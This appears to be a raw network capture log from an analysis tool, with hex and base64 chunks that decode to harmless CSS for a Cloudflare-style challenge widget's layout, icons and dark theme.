                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1057INData Raw: 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 74 63 62 69 41 67 49 43 42 6d 62 47 56 34 4c 57 52 70 63 6d 56 6a 64 47 6c 76 62 6a 6f 67 59 32 39 73 64 57 31 75 4f 31 78 75 49 43 41 67 49 47 31 68 63 6d 64 70 62 6a 6f 67 4d 43 41 78 4e 6e 42 34 49 44 41 67 4d 44 74 63 62 69 41 67 49 43 42 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 79 61 57 64 6f 64 44 74 63 62 6e 31 63 62 6c 78 75 49 33 4e 77 61 57 35 75 5a 58 49 74 61 57 4e 76 62 69 42 37 58 47 34 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 74 63 62 69 41 67 49 43 42 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 44 68 77 65 44 74 63 62 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4d 7a 42 77 65 44 74 63 62 69 41 67 49 43 42 6f 5a 57 6c 6e 61 48 51
                                                                                                                                                                                                                                                                                                              Data Ascii: ICAgZGlzcGxheTogZmxleDtcbiAgICBmbGV4LWRpcmVjdGlvbjogY29sdW1uO1xuICAgIG1hcmdpbjogMCAxNnB4IDAgMDtcbiAgICB0ZXh0LWFsaWduOiByaWdodDtcbn1cblxuI3NwaW5uZXItaWNvbiB7XG4gICAgZGlzcGxheTogZmxleDtcbiAgICBtYXJnaW4tcmlnaHQ6IDhweDtcbiAgICB3aWR0aDogMzBweDtcbiAgICBoZWlnaHQ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1058INData Raw: 37 66 66 38 0d 0a 53 31 74 61 58 52 6c 63 6d 78 70 62 57 6c 30 4f 69 41 78 4d 44 74 63 62 6c 78 75 49 43 41 67 49 43 35 77 4d 53 42 37 58 47 34 67 49 43 41 67 49 43 41 67 49 48 4e 30 63 6d 39 72 5a 53 31 6b 59 58 4e 6f 59 58 4a 79 59 58 6b 36 49 44 49 30 4d 6a 74 63 62 69 41 67 49 43 41 67 49 43 41 67 63 33 52 79 62 32 74 6c 4c 57 52 68 63 32 68 76 5a 6d 5a 7a 5a 58 51 36 49 44 49 30 4d 6a 74 63 62 69 41 67 49 43 41 67 49 43 41 67 59 6d 39 34 4c 58 4e 6f 59 57 52 76 64 7a 6f 67 61 57 35 7a 5a 58 51 67 4d 43 41 77 49 44 41 67 4a 48 4e 31 59 32 4e 6c 63 33 4d 74 59 32 39 73 62 33 49 74 4d 6a 74 63 62 69 41 67 49 43 41 67 49 43 41 67 59 57 35 70 62 57 46 30 61 57 39 75 4f 69 42 7a 64 48 4a 76 61 32 55 67 4d 43 34 30 63 79 42 6a 64 57 4a 70 59 79 31 69 5a 58
                                                                                                                                                                                                                                                                                                              Data Ascii: 7ff8S1taXRlcmxpbWl0OiAxMDtcblxuICAgIC5wMSB7XG4gICAgICAgIHN0cm9rZS1kYXNoYXJyYXk6IDI0MjtcbiAgICAgICAgc3Ryb2tlLWRhc2hvZmZzZXQ6IDI0MjtcbiAgICAgICAgYm94LXNoYWRvdzogaW5zZXQgMCAwIDAgJHN1Y2Nlc3MtY29sb3ItMjtcbiAgICAgICAgYW5pbWF0aW9uOiBzdHJva2UgMC40cyBjdWJpYy1iZX
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1059INData Raw: 49 43 41 67 49 43 41 67 66 56 78 75 49 43 41 67 49 48 31 63 62 6c 78 75 49 43 41 67 49 43 35 6a 64 48 41 74 59 32 68 6c 59 32 74 69 62 33 67 74 62 47 46 69 5a 57 77 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 75 62 57 46 79 61 79 42 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 36 49 44 4a 77 65 43 42 7a 62 32 78 70 5a 43 41 6b 5a 47 46 79 61 79 31 74 59 58 4a 72 4c 57 4e 76 62 47 39 79 4c 54 45 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6b 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 69 30 7a 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 61 57 35 77 64 58 51
                                                                                                                                                                                                                                                                                                              Data Ascii: ICAgICAgfVxuICAgIH1cblxuICAgIC5jdHAtY2hlY2tib3gtbGFiZWwge1xuICAgICAgICAubWFyayB7XG4gICAgICAgICAgICBib3JkZXI6IDJweCBzb2xpZCAkZGFyay1tYXJrLWNvbG9yLTE7XG4gICAgICAgICAgICBiYWNrZ3JvdW5kLWNvbG9yOiAkYmFja2dyb3VuZC1jb2xvci0zO1xuICAgICAgICB9XG5cbiAgICAgICAgaW5wdXQ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1061INData Raw: 43 52 6a 62 32 78 76 63 69 30 31 4f 31 78 75 49 43 41 67 49 48 31 63 62 6c 78 75 49 43 41 67 49 43 4e 6a 61 47 46 73 62 47 56 75 5a 32 55 74 5a 58 4a 79 62 33 49 74 64 47 6c 30 62 47 55 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 4a 47 4e 76 62 47 39 79 4c 54 4d 37 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 59 53 42 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 4a 47 4e 76 62 47 39 79 4c 54 59 37 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 59 36 64 6d 6c 7a 61 58 52 6c 5a 43 78 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 59 36 62 47 6c 75 61 79 42 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 32 39 73 62 33 49 36
                                                                                                                                                                                                                                                                                                              Data Ascii: CRjb2xvci01O1xuICAgIH1cblxuICAgICNjaGFsbGVuZ2UtZXJyb3ItdGl0bGUge1xuICAgICAgICBjb2xvcjogJGNvbG9yLTM7XG5cbiAgICAgICAgYSB7XG4gICAgICAgICAgICBjb2xvcjogJGNvbG9yLTY7XG5cbiAgICAgICAgICAgICY6dmlzaXRlZCxcbiAgICAgICAgICAgICY6bGluayB7XG4gICAgICAgICAgICAgICAgY29sb3I6
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1062INData Raw: 52 6a 62 32 78 76 63 69 30 32 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 4a 6a 70 68 59 33 52 70 64 6d 55 73 58 47 34 67 49 43 41 67 49 43 41 67 49 43 59 36 61 47 39 32 5a 58 49 73 58 47 34 67 49 43 41 67 49 43 41 67 49 43 59 36 5a 6d 39 6a 64 58 4d 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 32 39 73 62 33 49 36 49 43 52 6a 62 32 78 76 63 69 30 33 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 39 58 47 34 67 49 43 41 67 66 56 78 75 58 47 34 67 49 43 41 67 49 32 56 34 63 47 6c 79 5a 57 51 74 63 6d 56 6d 63 6d 56 7a 61 43 31 73 61 57 35 72 49 48 74 63 62 69 41 67 49 43 41 67 49 43 41 67 59 32 39 73 62 33 49 36 49 43 52 6a 62 32 78 76 63 69 30 32 4f 31 78 75 58 47 34 67 49 43 41 67 49
                                                                                                                                                                                                                                                                                                              Data Ascii: Rjb2xvci02O1xuICAgICAgICB9XG5cbiAgICAgICAgJjphY3RpdmUsXG4gICAgICAgICY6aG92ZXIsXG4gICAgICAgICY6Zm9jdXMge1xuICAgICAgICAgICAgY29sb3I6ICRjb2xvci03O1xuICAgICAgICB9XG4gICAgfVxuXG4gICAgI2V4cGlyZWQtcmVmcmVzaC1saW5rIHtcbiAgICAgICAgY29sb3I6ICRjb2xvci02O1xuXG4gICAgI
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1063INData Raw: 70 64 47 56 79 62 47 6c 74 61 58 51 36 49 44 45 77 4f 31 78 75 49 43 41 67 49 48 4e 30 63 6d 39 72 5a 54 6f 67 4a 47 5a 68 61 57 77 74 59 32 39 73 62 33 49 74 4d 54 74 63 62 69 41 67 49 43 42 6d 61 57 78 73 4f 69 42 75 62 32 35 6c 4f 31 78 75 49 43 41 67 49 47 46 75 61 57 31 68 64 47 6c 76 62 6a 6f 67 63 33 52 79 62 32 74 6c 49 44 41 75 4e 6e 4d 67 59 33 56 69 61 57 4d 74 59 6d 56 36 61 57 56 79 4b 44 41 75 4e 6a 55 73 49 44 41 73 49 44 41 75 4e 44 55 73 49 44 45 70 49 47 5a 76 63 6e 64 68 63 6d 52 7a 4f 31 78 75 66 56 78 75 58 47 34 75 5a 6d 46 70 62 48 56 79 5a 53 31 6a 63 6d 39 7a 63 79 42 37 58 47 34 67 49 43 41 67 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 4c 57 39 79 61 57 64 70 62 6a 6f 67 4e 54 41 6c 49 44 55 77 4a 54 74 63 62 69 41 67 49 43 42 7a 64 48
                                                                                                                                                                                                                                                                                                              Data Ascii: pdGVybGltaXQ6IDEwO1xuICAgIHN0cm9rZTogJGZhaWwtY29sb3ItMTtcbiAgICBmaWxsOiBub25lO1xuICAgIGFuaW1hdGlvbjogc3Ryb2tlIDAuNnMgY3ViaWMtYmV6aWVyKDAuNjUsIDAsIDAuNDUsIDEpIGZvcndhcmRzO1xufVxuXG4uZmFpbHVyZS1jcm9zcyB7XG4gICAgdHJhbnNmb3JtLW9yaWdpbjogNTAlIDUwJTtcbiAgICBzdH
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1065INData Raw: 49 43 41 67 49 43 41 67 49 43 41 67 49 48 34 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 35 74 59 58 4a 72 49 48 74 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4f 69 41 79 63 48 67 67 63 32 39 73 61 57 51 67 4a 47 5a 68 61 57 77 74 59 32 39 73 62 33 49 74 4d 54 74 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 7a 63 47 46 75 4c 6d 4e 30 63 43 31 73 59 57 4a 6c 62 43 42 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 52 6c 65 48 51 74 5a 47 56 6a 62 33 4a 68 64 47 6c 76 62 6a 6f 67 64 57 35 6b 5a 58 4a
                                                                                                                                                                                                                                                                                                              Data Ascii: ICAgICAgICAgIH4ge1xuICAgICAgICAgICAgICAgIC5tYXJrIHtcbiAgICAgICAgICAgICAgICAgICAgYm9yZGVyOiAycHggc29saWQgJGZhaWwtY29sb3ItMTtcbiAgICAgICAgICAgICAgICB9XG5cbiAgICAgICAgICAgICAgICBzcGFuLmN0cC1sYWJlbCB7XG4gICAgICAgICAgICAgICAgICAgIHRleHQtZGVjb3JhdGlvbjogdW5kZXJ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1066INData Raw: 43 41 67 49 43 41 67 49 43 42 73 5a 57 5a 30 4f 69 41 78 4f 48 42 34 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 30 63 6d 46 75 63 32 6c 30 61 57 39 75 4f 69 42 68 62 47 77 67 4d 43 34 78 63 79 42 6c 59 58 4e 6c 4c 57 6c 75 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 36 4c 57 6c 75 5a 47 56 34 4f 69 41 35 4f 54 6b 34 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 36 49 44 4a 77 65 43 42 7a 62 32 78 70 5a 43 41 6b 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 69 30 31 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 74 63 6d 46 6b 61 58 56 7a 4f 69 41 7a 63 48 67 37 58 47 34 67 49 43 41 67 49 43 41 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 36 49 43 4e 6d 5a 6d 59 37 58 47 34 67 49 43 41 67
                                                                                                                                                                                                                                                                                                              Data Ascii: CAgICAgICBsZWZ0OiAxOHB4O1xuICAgICAgICB0cmFuc2l0aW9uOiBhbGwgMC4xcyBlYXNlLWluO1xuICAgICAgICB6LWluZGV4OiA5OTk4O1xuICAgICAgICBib3JkZXI6IDJweCBzb2xpZCAkYmFja2dyb3VuZC1jb2xvci01O1xuICAgICAgICBib3JkZXItcmFkaXVzOiAzcHg7XG4gICAgICAgIGJhY2tncm91bmQ6ICNmZmY7XG4gICAg
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1067INData Raw: 41 31 63 48 67 37 58 47 34 67 49 43 41 67 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 41 37 58 47 34 67 49 43 41 67 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 6a 4a 77 65 44 74 63 62 69 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 75 59 32 49 74 59 32 39 75 64 47 46 70 62 6d 56 79 49 48 74 63 62 69 41 67 49 43 41 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 33 42 34 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 74 59 58 4a 6e 61 57 34 74 62 47 56 6d 64 44 6f 67 4d 44 74 63 62 69 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 6a 59 6e 4a 68 62 6d 52 70 62 6d 63 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 42 6b 61 58 4e 77 62 47 46 35 4f 69 42 6d 62 47 56 34 4f 31 78 75 49 43 41 67 49
                                                                                                                                                                                                                                                                                                              Data Ascii: A1cHg7XG4gICAgICAgIG1hcmdpbi1ib3R0b206IDA7XG4gICAgICAgIGhlaWdodDogMjJweDtcbiAgICB9XG5cbiAgICAuY2ItY29udGFpbmVyIHtcbiAgICAgICAgbWFyZ2luLXRvcDogM3B4O1xuICAgICAgICBtYXJnaW4tbGVmdDogMDtcbiAgICB9XG5cbiAgICAjYnJhbmRpbmcge1xuICAgICAgICBkaXNwbGF5OiBmbGV4O1xuICAgI
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1069INData Raw: 67 49 32 56 34 63 47 6c 79 5a 57 51 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 42 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 35 63 48 67 37 58 47 34 67 49 43 41 67 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 41 78 4d 58 42 34 4f 31 78 75 49 43 41 67 49 48 31 63 62 6c 78 75 49 43 41 67 49 43 4e 6a 61 47 46 73 62 47 56 75 5a 32 55 74 5a 58 4a 79 62 33 49 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 42 74 59 58 4a 6e 61 57 34 36 49 44 41 67 4d 6e 42 34 4f 31 78 75 49 43 41 67 49 48 31 63 62 6e 31 63 62 6c 78 75 4c 6d 4e 30 63 43 31 73 59 57 4a 6c 62 43 42 37 58 47 34 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 74 63 62 69 41 67 49 43 42 6d 62 47 56 34 4c 57 5a 73 62 33 63 36 49 48 4a 76 64 79 31 79 5a 58
                                                                                                                                                                                                                                                                                                              Data Ascii: gI2V4cGlyZWQge1xuICAgICAgICBtYXJnaW4tdG9wOiA5cHg7XG4gICAgICAgIG1hcmdpbi1sZWZ0OiAxMXB4O1xuICAgIH1cblxuICAgICNjaGFsbGVuZ2UtZXJyb3Ige1xuICAgICAgICBtYXJnaW46IDAgMnB4O1xuICAgIH1cbn1cblxuLmN0cC1sYWJlbCB7XG4gICAgZGlzcGxheTogZmxleDtcbiAgICBmbGV4LWZsb3c6IHJvdy1yZX
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1070INData Raw: 66 56 78 75 58 47 34 67 49 43 41 67 49 43 41 67 49 43 4e 30 5a 58 4a 74 63 79 42 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 37 58 47 34 67 49 43 41 67 49 43 41 67 49 48 31 63 62 6c 78 75 49 43 41 67 49 43 41 67 49 43 41 6a 59 32 59 74 63 33 52 68 5a 32 55 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 4e 44 68 77 65 44 74 63 62 69 41 67 49 43 41 67 49 43 41 67 66 56 78 75 58 47 34 67 49 43 41 67 49 43 41 67 49 43 4e 7a 64 57 4e 6a 5a 58 4e 7a 4c 57 6c 6a 62 32 34 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 62 47 56 6d 64 44 6f 67 4f 44 5a 77 65 44 74 63 62 69 41 67 49 43 41
                                                                                                                                                                                                                                                                                                              Data Ascii: fVxuXG4gICAgICAgICN0ZXJtcyB7XG4gICAgICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7XG4gICAgICAgIH1cblxuICAgICAgICAjY2Ytc3RhZ2Uge1xuICAgICAgICAgICAgcGFkZGluZy1yaWdodDogNDhweDtcbiAgICAgICAgfVxuXG4gICAgICAgICNzdWNjZXNzLWljb24ge1xuICAgICAgICAgICAgbGVmdDogODZweDtcbiAgICA
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1071INData Raw: 69 31 73 5a 57 5a 30 4f 69 41 77 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 79 61 57 64 6f 64 44 74 63 62 69 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 75 59 32 49 74 59 32 39 75 64 47 46 70 62 6d 56 79 49 48 74 63 62 69 41 67 49 43 41 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 44 41 37 58 47 34 67 49 43 41 67 66 56 78 75 66 56 78 75 58 47 34 6a 64 47 56 79 62 58 4d 67 65 31 78 75 49 43 41 67 49 47 52 70 63 33 42 73 59 58 6b 36 49 47 5a 73 5a 58 67 37 58 47 34 67 49 43 41 67 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4f 69 42 7a 63 47 46 6a 5a 53 31 6c 64 6d 56 75 62 48 6b 37 58 47 34 67 49 43 41 67 62 47 6c 75 5a 53 31 6f 5a 57 6c 6e 61 48 51 36 49 44 45 77
                                                                                                                                                                                                                                                                                                              Data Ascii: i1sZWZ0OiAwO1xuICAgICAgICB0ZXh0LWFsaWduOiByaWdodDtcbiAgICB9XG5cbiAgICAuY2ItY29udGFpbmVyIHtcbiAgICAgICAgbWFyZ2luLWxlZnQ6IDA7XG4gICAgfVxufVxuXG4jdGVybXMge1xuICAgIGRpc3BsYXk6IGZsZXg7XG4gICAganVzdGlmeS1jb250ZW50OiBzcGFjZS1ldmVubHk7XG4gICAgbGluZS1oZWlnaHQ6IDEw
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1073INData Raw: 41 67 49 43 41 67 59 32 39 73 62 33 49 36 49 43 52 6a 62 32 78 76 63 69 30 78 4f 31 78 75 58 47 34 67 49 43 41 67 49 43 41 67 49 43 59 36 61 47 39 32 5a 58 49 73 58 47 34 67 49 43 41 67 49 43 41 67 49 43 59 36 5a 6d 39 6a 64 58 4d 73 58 47 34 67 49 43 41 67 49 43 41 67 49 43 59 36 59 57 4e 30 61 58 5a 6c 49 48 74 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 52 6c 65 48 51 74 5a 47 56 6a 62 33 4a 68 64 47 6c 76 62 6a 6f 67 64 57 35 6b 5a 58 4a 73 61 57 35 6c 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 32 39 73 62 33 49 36 49 43 52 6a 62 32 78 76 63 69 30 30 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 4a 6a 70 73 61 57 35 72 4c 46 78 75 49 43 41 67 49 43 41 67 49 43 41 6d 4f
                                                                                                                                                                                                                                                                                                              Data Ascii: AgICAgY29sb3I6ICRjb2xvci0xO1xuXG4gICAgICAgICY6aG92ZXIsXG4gICAgICAgICY6Zm9jdXMsXG4gICAgICAgICY6YWN0aXZlIHtcbiAgICAgICAgICAgIHRleHQtZGVjb3JhdGlvbjogdW5kZXJsaW5lO1xuICAgICAgICAgICAgY29sb3I6ICRjb2xvci00O1xuICAgICAgICB9XG5cbiAgICAgICAgJjpsaW5rLFxuICAgICAgICAmO
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1074INData Raw: 6f 59 57 52 76 64 7a 6f 67 61 57 35 7a 5a 58 51 67 4d 43 41 77 49 44 41 67 4a 47 4e 76 62 47 39 79 4c 54 45 37 58 47 34 67 49 43 41 67 49 43 41 67 49 47 46 75 61 57 31 68 64 47 6c 76 62 6a 70 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 5a 70 62 47 78 6d 59 57 6c 73 4c 57 39 6d 5a 6d 78 68 59 6d 56 73 49 44 41 75 4e 48 4d 67 5a 57 46 7a 5a 53 31 70 62 69 31 76 64 58 51 67 4d 43 34 30 63 79 42 6d 62 33 4a 33 59 58 4a 6b 63 79 78 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 4e 6a 59 57 78 6c 49 44 41 75 4d 33 4d 67 5a 57 46 7a 5a 53 31 70 62 69 31 76 64 58 51 67 4d 43 34 35 63 79 42 69 62 33 52 6f 4f 31 78 75 49 43 41 67 49 48 31 63 62 6e 31 63 62 6c 78 75 4c 6e 52 6f 5a 57 31 6c 4c 57 52 68 63 6d 73 75 62 32 5a 6d 62 47 46 69 5a 57
                                                                                                                                                                                                                                                                                                              Data Ascii: oYWRvdzogaW5zZXQgMCAwIDAgJGNvbG9yLTE7XG4gICAgICAgIGFuaW1hdGlvbjpcbiAgICAgICAgICAgIGZpbGxmYWlsLW9mZmxhYmVsIDAuNHMgZWFzZS1pbi1vdXQgMC40cyBmb3J3YXJkcyxcbiAgICAgICAgICAgIHNjYWxlIDAuM3MgZWFzZS1pbi1vdXQgMC45cyBib3RoO1xuICAgIH1cbn1cblxuLnRoZW1lLWRhcmsub2ZmbGFiZW
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1075INData Raw: 5a 58 67 37 58 47 34 67 49 43 41 67 59 57 78 70 5a 32 34 74 61 58 52 6c 62 58 4d 36 49 47 4e 6c 62 6e 52 6c 63 6a 74 63 62 69 41 67 49 43 42 74 59 58 4a 6e 61 57 34 74 62 47 56 6d 64 44 6f 67 4d 54 46 77 65 44 74 63 62 6e 31 63 62 6c 78 75 4c 6d 78 76 5a 32 38 74 64 47 56 34 64 43 42 37 58 47 34 67 49 43 41 67 5a 6d 6c 73 62 44 6f 67 49 7a 41 77 4d 44 74 63 62 6e 31 63 62 6c 78 75 49 33 46 79 49 48 74 63 62 69 41 67 49 43 42 6d 61 57 78 73 4f 69 41 6b 59 32 39 73 62 33 49 74 4d 54 74 63 62 6e 31 63 62 6c 78 75 59 6d 39 6b 65 53 35 30 61 47 56 74 5a 53 31 6b 59 58 4a 72 49 48 74 63 62 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6b 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 69 30 7a 4f 31 78
                                                                                                                                                                                                                                                                                                              Data Ascii: ZXg7XG4gICAgYWxpZ24taXRlbXM6IGNlbnRlcjtcbiAgICBtYXJnaW4tbGVmdDogMTFweDtcbn1cblxuLmxvZ28tdGV4dCB7XG4gICAgZmlsbDogIzAwMDtcbn1cblxuI3FyIHtcbiAgICBmaWxsOiAkY29sb3ItMTtcbn1cblxuYm9keS50aGVtZS1kYXJrIHtcbiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAkYmFja2dyb3VuZC1jb2xvci0zO1x
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1077INData Raw: 33 63 36 49 47 4e 76 62 48 56 74 62 69 42 75 62 33 64 79 59 58 41 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 68 62 47 6c 6e 62 69 31 6a 62 32 35 30 5a 57 35 30 4f 69 42 6d 62 47 56 34 4c 57 56 75 5a 44 74 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 46 73 61 57 64 75 4c 57 6c 30 5a 57 31 7a 4f 69 42 6d 62 47 56 34 4c 57 56 75 5a 44 74 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 70 31 63 33 52 70 5a 6e 6b 74 59 32 39 75 64 47 56 75 64 44 6f 67 5a 6d 78 6c 65 43 31 7a 64 47 46 79 64 44 74 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 31 68 63 6d 64 70 62 6a 6f 67 4d 44 74 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 5a 77 65 44 74 63 62 69 41 67
                                                                                                                                                                                                                                                                                                              Data Ascii: 3c6IGNvbHVtbiBub3dyYXA7XG4gICAgICAgICAgICBhbGlnbi1jb250ZW50OiBmbGV4LWVuZDtcbiAgICAgICAgICAgIGFsaWduLWl0ZW1zOiBmbGV4LWVuZDtcbiAgICAgICAgICAgIGp1c3RpZnktY29udGVudDogZmxleC1zdGFydDtcbiAgICAgICAgICAgIG1hcmdpbjogMDtcbiAgICAgICAgICAgIG1hcmdpbi10b3A6IDZweDtcbiAg
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1078INData Raw: 56 34 4c 57 56 75 5a 44 74 63 62 69 41 67 49 43 41 67 49 43 41 67 62 47 6c 75 5a 53 31 6f 5a 57 6c 6e 61 48 51 36 49 44 45 77 63 48 67 37 58 47 34 67 49 43 41 67 49 43 41 67 49 47 5a 76 62 6e 51 74 63 33 52 35 62 47 55 36 49 47 35 76 63 6d 31 68 62 44 74 63 62 6c 78 75 49 43 41 67 49 43 41 67 49 43 41 75 62 47 6c 75 61 79 31 7a 63 47 46 6a 5a 58 49 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 62 6d 39 75 5a 54 74 63 62 69 41 67 49 43 41 67 49 43 41 67 66 56 78 75 49 43 41 67 49 48 31 63 62 6c 78 75 49 43 41 67 49 43 35 6a 64 48 41 74 62 47 46 69 5a 57 77 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 42 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 78 63 48 67 37 58 47 34 67 49 43 41 67 66 56 78 75 58
                                                                                                                                                                                                                                                                                                              Data Ascii: V4LWVuZDtcbiAgICAgICAgbGluZS1oZWlnaHQ6IDEwcHg7XG4gICAgICAgIGZvbnQtc3R5bGU6IG5vcm1hbDtcblxuICAgICAgICAubGluay1zcGFjZXIge1xuICAgICAgICAgICAgZGlzcGxheTogbm9uZTtcbiAgICAgICAgfVxuICAgIH1cblxuICAgIC5jdHAtbGFiZWwge1xuICAgICAgICBmb250LXNpemU6IDExcHg7XG4gICAgfVxuX
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1079INData Raw: 69 5a 57 77 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 4c 6d 31 68 63 6d 73 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 45 78 63 48 67 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 6c 75 63 48 56 30 49 48 74 63 62 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 73 5a 57 5a 30 4f 69 41 78 4d 58 42 34 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 66 56 78 75 49 43 41 67 49 43 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 49 32 4e 6f 59 57 78 73 5a 57 35 6e 5a 53 31 6c 63 6e 4a 76 63 69 31 30 5a 58 68 30 49 48 74 63 62 69 41 67 49 43 41 67 